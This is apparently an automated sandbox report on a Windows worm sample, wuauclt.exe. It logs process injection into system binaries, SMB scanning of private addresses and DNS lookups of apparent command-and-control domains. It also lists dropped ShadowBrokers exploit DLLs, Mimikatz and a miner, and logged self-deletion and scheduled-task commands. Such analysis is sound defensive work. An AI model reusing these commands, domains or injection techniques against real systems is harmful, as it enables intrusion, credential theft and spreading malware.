      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_00971477 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00971477
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_00970D6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00970D6D
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_01353DB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_01353DB4
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0135B5DC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0135B5DC
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FA93E0 FreeConsole,SetUnhandledExceptionFilter,Sleep,Sleep,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,GetTickCount,GetTickCount,GetTickCount,Sleep,GetTickCount,ExitProcess,21_2_02FA93E0
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FB15D6 SetUnhandledExceptionFilter,21_2_02FB15D6
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FB5A46 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_02FB5A46
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FB1477 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_02FB1477
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FB0D6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_02FB0D6D
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_028693E0 FreeConsole,SetUnhandledExceptionFilter,Sleep,Sleep,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,GetTickCount,GetTickCount,GetTickCount,Sleep,GetTickCount,ExitProcess,23_2_028693E0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_02875A46 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_02875A46
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_02871477 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_02871477
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_028715D6 SetUnhandledExceptionFilter,23_2_028715D6
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_02870D6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_02870D6D
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E093E0 FreeConsole,SetUnhandledExceptionFilter,Sleep,Sleep,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,GetTickCount,GetTickCount,GetTickCount,Sleep,GetTickCount,ExitProcess,24_2_02E093E0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E15A46 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_02E15A46
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E11477 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_02E11477
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E115D6 SetUnhandledExceptionFilter,24_2_02E115D6
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E10D6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_02E10D6D

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.2 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.1 57084
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.8 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.39 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.7 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.38 445
      Source: C:\Windows\SysWOW64\svchost.exeDomain query: date.affordblue.com
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.9 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.3 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.6 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.5 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.42 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.41 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.44 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.43 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.46 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.45 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.48 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.47 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.40 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.28 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.27 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.29 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.31 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.30 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.33 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.32 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.35 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.34 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.37 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.36 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.17 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.16 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.19 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.18 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.20 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.22 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.21 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.24 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.23 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.26 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.25 445
      Source: C:\Windows\SysWOW64\svchost.exeDomain query: r.affordblue.com
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.49 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.53 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.52 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.11 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.55 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeDomain query: load.affordblue.com
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.10 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.54 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.13 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.57 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.12 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.56 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.15 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.59 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.14 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.58 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.51 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bk.estonine.com
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.50 445Jump to behavior
      Allocates memory in foreign processes
      Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: C:\Windows\SysWOW64\ctfmon.exe base: 960000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: C:\Windows\SysWOW64\SearchProtocolHost.exe base: 2FA0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: C:\Windows\System32\conhost.exe base: 2860000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: C:\Windows\SysWOW64\dllhost.exe base: 2E00000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: C:\Windows\SysWOW64\ctfmon.exe base: 750000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: C:\Windows\SysWOW64\ctfmon.exe base: 790000 protect: page execute and read and writeJump to behavior
      Injects a PE file into a foreign processes
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\ctfmon.exe base: 960000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\SearchProtocolHost.exe base: 2FA0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\System32\conhost.exe base: 2860000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 2E00000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4E0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 8A0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\ctfmon.exe base: 750000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\ctfmon.exe base: 790000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 820000 value starts with: 4D5AJump to behavior
      DLL side loading technique detected
      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: C:\Windows\SysWOW64\FunctionProtocolHost.dllJump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\ctfmon.exe base: 960000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\ctfmon.exe base: B3B008Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\SearchProtocolHost.exe base: 2FA0000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\SearchProtocolHost.exe base: 3071008Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\System32\conhost.exe base: 2860000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\System32\conhost.exe base: 278C008Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 2E00000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 2C5A008Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\ctfmon.exe base: 750000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\ctfmon.exe base: 878008Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\ctfmon.exe base: 790000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\ctfmon.exe base: 80E008Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /End /TN "\Microsoft\Windows\UPnP\RpcPolicyHost"Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /Delete /TN "\Microsoft\Windows\UPnP\RpcPolicyHost" /FJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\ctfmon.exe C:\Windows\system32\ctfmon.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe C:\Windows\system32\searchprotocolhost.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\system32\dllhost.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\ctfmon.exe C:\Windows\system32\ctfmon.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\ctfmon.exe C:\Windows\system32\ctfmon.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 5 Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeCode function: IsValidCodePage,GetLocaleInfoW,2_2_039AF3D6
      Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_039AFB3A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,2_2_039AFA11
      Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,2_2_039AFA08
      Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,2_2_039A51B5
      Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,2_2_039AF734
      Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,2_2_039AF699
      Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,2_2_039AF64E
      Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,2_2_039AF5A5
      Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,2_2_039A4DF0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_039AFD0E
      Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,2_2_039AFC41
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_00257BDE cpuid 0_2_00257BDE
      Source: C:\Users\user\Desktop\wuauclt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_00257881 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00257881
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03997CA0 Sleep,Sleep,DeleteFileA,GetVersionExA,Sleep,Sleep,Sleep,WaitForSingleObject,TerminateProcess,TerminateThread,Sleep,DeleteFileA,Sleep,Sleep,TerminateProcess,TerminateThread,Sleep,2_2_03997CA0
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_00968EC0 socket,htons,htonl,bind,listen,15_2_00968EC0
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FA8EC0 socket,htons,htonl,bind,listen,21_2_02FA8EC0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_02868EC0 socket,htons,htonl,bind,listen,23_2_02868EC0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E08EC0 socket,htons,htonl,bind,listen,24_2_02E08EC0

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts2
      Native API      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Deobfuscate/Decode Files or Information      		OS Credential Dumping1
      System Time Discovery      		Remote Services11
      Archive Collected Data      		Exfiltration Over Other Network Medium2
      Ingress Tool Transfer      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      Data Encrypted for Impact
      Default Accounts2
      Command and Scripting Interpreter      		122
      Windows Service      		122
      Windows Service      		2
      Obfuscated Files or Information      		LSASS Memory1
      File and Directory Discovery      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
      Encrypted Channel      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts1
      Scheduled Task/Job      		1
      Scheduled Task/Job      		411
      Process Injection      		1
      DLL Side-Loading      		Security Account Manager25
      System Information Discovery      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts2
      Service Execution      		Logon Script (Mac)1
      Scheduled Task/Job      		11
      File Deletion      		NTDS1
      Network Share Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer12
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script12
      Masquerading      		LSA Secrets231
      Security Software Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common21
      Virtualization/Sandbox Evasion      		Cached Domain Credentials21
      Virtualization/Sandbox Evasion      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items411
      Process Injection      		DCSync2
      Process Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
      Application Window Discovery      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow11
      Remote System Discovery      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing11
      System Network Configuration Discovery      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 576901 Sample: wuauclt.exe Startdate: 23/02/2022 Architecture: WINDOWS Score: 100 68 load.affordblue.com 2->68 70 r.affordblue.com 2->70 72 date.affordblue.com 2->72 96 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->96 98 Malicious sample detected (through community Yara rule) 2->98 100 Antivirus detection for URL or domain 2->100 104 9 other signatures 2->104 8 svchost.exe 1 2->8         started        13 wuauclt.exe 4 10 2->13         started        15 svchost.exe 1 2->15         started        17 3 other processes 2->17 signatures3 102 System process connects to network (likely due to code injection or exploit) 68->102 process4 dnsIp5 88 r.affordblue.com 8->88 90 date.affordblue.com 8->90 94 3 other IPs or domains 8->94 64 C:\Windows\SysWOW64\dllhostex.exe, PE32 8->64 dropped 134 System process connects to network (likely due to code injection or exploit) 8->134 136 Drops executables to the windows directory (C:\Windows) and starts them 8->136 138 Uses schtasks.exe or at.exe to add and modify task schedules 8->138 144 4 other signatures 8->144 19 ctfmon.exe 5 8->19         started        24 svchost.exe 8->24         started        26 svchost.exe 2 8->26         started        32 9 other processes 8->32 92 log.boreye.com 72.52.178.23, 49766, 49786, 49881 LIQUIDWEBUS United States 13->92 66 C:\Windows\...\FunctionProtocolHost.dll, PE32 13->66 dropped 140 Self deletion via cmd delete 13->140 142 Creates a Windows Service pointing to an executable in C:\Windows 13->142 28 cmd.exe 1 13->28         started        30 conhost.exe 13->30         started        file6 signatures7 process8 dnsIp9 74 192.168.2.10 unknown unknown 19->74 76 192.168.2.11 unknown unknown 19->76 82 51 other IPs or domains 19->82 54 C:\Windows54etworkDistribution\cnli-0.dll, PE32 19->54 dropped 56 C:\Windows56etworkDistribution\adfw.dll, PE32 19->56 dropped 58 C:\Windows58etworkDistribution\adfw-2.dll, PE32 19->58 dropped 110 Found stalling execution ending in API Sleep call 19->110 112 Contains functionality to detect sleep reduction / modifications 19->112 114 System process connects to network (likely due to code injection or exploit) 24->114 116 Connects to many different private IPs via SMB (likely to spread or exploit) 24->116 118 Connects to many different private IPs (likely to spread or exploit) 24->118 120 Drops executables to the windows directory (C:\Windows) and starts them 24->120 34 WUDHostServices.exe 24->34         started        60 C:\Windows\SysWOW64\WUDHostServices.exe, PE32 26->60 dropped 36 WUDHostServices.exe 26->36         started        122 Uses ping.exe to sleep 28->122 124 Self deletion via cmd delete 28->124 126 Uses ping.exe to check the status of other devices and networks 28->126 39 PING.EXE 1 28->39         started        42 cmd.exe 1 28->42         started        44 conhost.exe 28->44         started        78 192.168.2.55 unknown unknown 32->78 80 192.168.2.56 unknown unknown 32->80 84 15 other IPs or domains 32->84 62 C:\Windows62etworkDistribution\cnli-1.dll, PE32 32->62 dropped 128 Antivirus detection for dropped file 32->128 130 Multi AV Scanner detection for dropped file 32->130 132 Machine Learning detection for dropped file 32->132 46 conhost.exe 32->46         started        48 conhost.exe 32->48         started        50 conhost.exe 32->50         started        52 WUDHostServices.exe 32->52         started        file10 signatures11 process12 dnsIp13 106 Multi AV Scanner detection for dropped file 36->106 108 Machine Learning detection for dropped file 36->108 86 127.0.0.1 unknown unknown 39->86 signatures14

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      wuauclt.exe83%VirustotalBrowse
      wuauclt.exe54%MetadefenderBrowse
      wuauclt.exe96%ReversingLabsWin32.Trojan.Vools
      wuauclt.exe100%AviraHEUR/AGEN.1134403
      wuauclt.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Windows\NetworkDistribution\cnli-0.dll100%AviraTR/ShadowBrokers.xbdrs
      C:\Windows\SysWOW64\FunctionProtocolHost.dll100%AviraHEUR/AGEN.1107841
      C:\Windows\NetworkDistribution\adfw.dll100%AviraTR/ShadowBrokers.gpoeb
      C:\Windows\NetworkDistribution\adfw-2.dll100%AviraTR/ShadowBrokers.bhlos
      C:\Windows\NetworkDistribution\cnli-1.dll100%AviraEXP/Equation.H
      C:\Windows\SysWOW64\dllhostex.exe100%AviraHEUR/AGEN.1134782
      C:\Windows\SysWOW64\FunctionProtocolHost.dll100%Joe Sandbox ML
      C:\Windows\SysWOW64\WUDHostServices.exe100%Joe Sandbox ML
      C:\Windows\SysWOW64\dllhostex.exe100%Joe Sandbox ML
      C:\Windows\NetworkDistribution\adfw-2.dll83%MetadefenderBrowse
      C:\Windows\NetworkDistribution\adfw-2.dll96%ReversingLabsWin32.Exploit.ShadowBrokers
      C:\Windows\NetworkDistribution\adfw.dll69%MetadefenderBrowse
      C:\Windows\NetworkDistribution\adfw.dll89%ReversingLabsWin32.Exploit.ShadowBrokers
      C:\Windows\NetworkDistribution\cnli-0.dll75%MetadefenderBrowse
      C:\Windows\NetworkDistribution\cnli-0.dll93%ReversingLabsWin32.Trojan.EquationDrug
      C:\Windows\NetworkDistribution\cnli-1.dll75%MetadefenderBrowse
      C:\Windows\NetworkDistribution\cnli-1.dll96%ReversingLabsWin32.Trojan.Equation
      C:\Windows\SysWOW64\WUDHostServices.exe33%MetadefenderBrowse
      C:\Windows\SysWOW64\WUDHostServices.exe69%ReversingLabsWin32.Hacktool.Mimikatz
      C:\Windows\SysWOW64\dllhostex.exe54%MetadefenderBrowse
      C:\Windows\SysWOW64\dllhostex.exe90%ReversingLabsWin32.Trojan.Miner

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      21.0.SearchProtocolHost.exe.2fd7468.4.unpack100%AviraHEUR/AGEN.1110392Download File
      2.3.svchost.exe.4f00000.6.unpack100%AviraHEUR/AGEN.1134403Download File
      23.2.dllhost.exe.2860000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      29.0.svchost.exe.8a0000.3.unpack100%AviraHEUR/AGEN.1134403Download File
      23.0.dllhost.exe.2860000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      33.0.ctfmon.exe.7c7468.4.unpack100%AviraHEUR/AGEN.1110392Download File
      21.2.SearchProtocolHost.exe.2fa0000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      29.0.svchost.exe.8d7468.4.unpack100%AviraHEUR/AGEN.1110392Download File
      23.0.dllhost.exe.2897468.4.unpack100%AviraHEUR/AGEN.1110392Download File
      2.3.svchost.exe.4f37468.18.unpack100%AviraHEUR/AGEN.1110392Download File
      2.3.svchost.exe.4f37468.7.unpack100%AviraHEUR/AGEN.1110392Download File
      35.0.svchost.exe.857468.2.unpack100%AviraHEUR/AGEN.1110392Download File
      24.0.dllhost.exe.2e37468.1.unpack100%AviraHEUR/AGEN.1110392Download File
      21.2.SearchProtocolHost.exe.2fd7468.2.unpack100%AviraHEUR/AGEN.1110392Download File
      15.0.ctfmon.exe.960000.3.unpack100%AviraHEUR/AGEN.1134403Download File
      29.2.svchost.exe.8a0000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      35.0.svchost.exe.857468.4.unpack100%AviraHEUR/AGEN.1110392Download File
      24.0.dllhost.exe.2e00000.3.unpack100%AviraHEUR/AGEN.1134403Download File
      2.3.svchost.exe.4b77268.15.unpack100%AviraHEUR/AGEN.1110392Download File
      21.0.SearchProtocolHost.exe.2fa0000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      24.2.dllhost.exe.2e00000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      2.3.svchost.exe.4f37468.57.unpack100%AviraHEUR/AGEN.1110392Download File
      2.3.svchost.exe.4b77268.59.unpack100%AviraHEUR/AGEN.1110392Download File
      33.2.ctfmon.exe.790000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      2.3.svchost.exe.4f00000.49.unpack100%AviraHEUR/AGEN.1134403Download File
      2.3.svchost.exe.4b77268.48.unpack100%AviraHEUR/AGEN.1110392Download File
      32.0.ctfmon.exe.750000.3.unpack100%AviraHEUR/AGEN.1134403Download File
      2.3.svchost.exe.4f37468.38.unpack100%AviraHEUR/AGEN.1110392Download File
      2.2.svchost.exe.6fd50000.7.unpack100%AviraHEUR/AGEN.1107841Download File
